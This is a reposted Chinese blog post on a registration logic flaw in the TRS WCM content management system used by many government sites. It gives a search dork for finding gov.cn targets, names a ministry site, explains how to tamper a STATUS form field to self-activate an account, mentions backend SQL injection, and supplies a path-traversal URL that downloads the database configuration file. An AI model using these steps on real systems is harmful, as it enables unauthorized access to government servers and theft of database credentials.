(转载)TRS内容管理平台用户注册逻辑漏洞

于 2014-08-15 15:42:00 发布
阅读量276 收藏
点赞数
文章标签: 数据库 java
原文链接:http://www.cnblogs.com/cookies9/p/3915028.html
版权

首先

site:gov.cn inurl:WCM

TRS 的内容管理系统是国内政府网站使用最多的系统之一





如上面所说:外交部 http://wcm.fmprc.gov.cn/wcm/



网址加上:wcm/console/auth/reg_newuser.jsp

http://localhost:9999/wcm/console/auth/reg_newuser.jsp

注册,注意使用fireBUG修改表单,注意下图



即将随意表单改成 STATUS 值为 30,或增加STATUS字段表单。

然后提交注册



虽然说是“请等待开通!”,但实际上已经开通了,因为 STATUS 字段让我们改成正常了。

直接登陆



虽然没什么权限,但后台存在大量注入等漏洞

如:







可以通过注入直接操作数据库了。

http://localhost:9999/wcm/file/read_file.jsp?FileName=U020120628383491551127/../../../../../Tomcat/webapps/wcm/WEB-INF/classes/trsconfig/domain/config.xml&sDownName=xx

直接下载数据库配置文件

转载于:https://www.cnblogs.com/cookies9/p/3915028.html

aocong5568
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值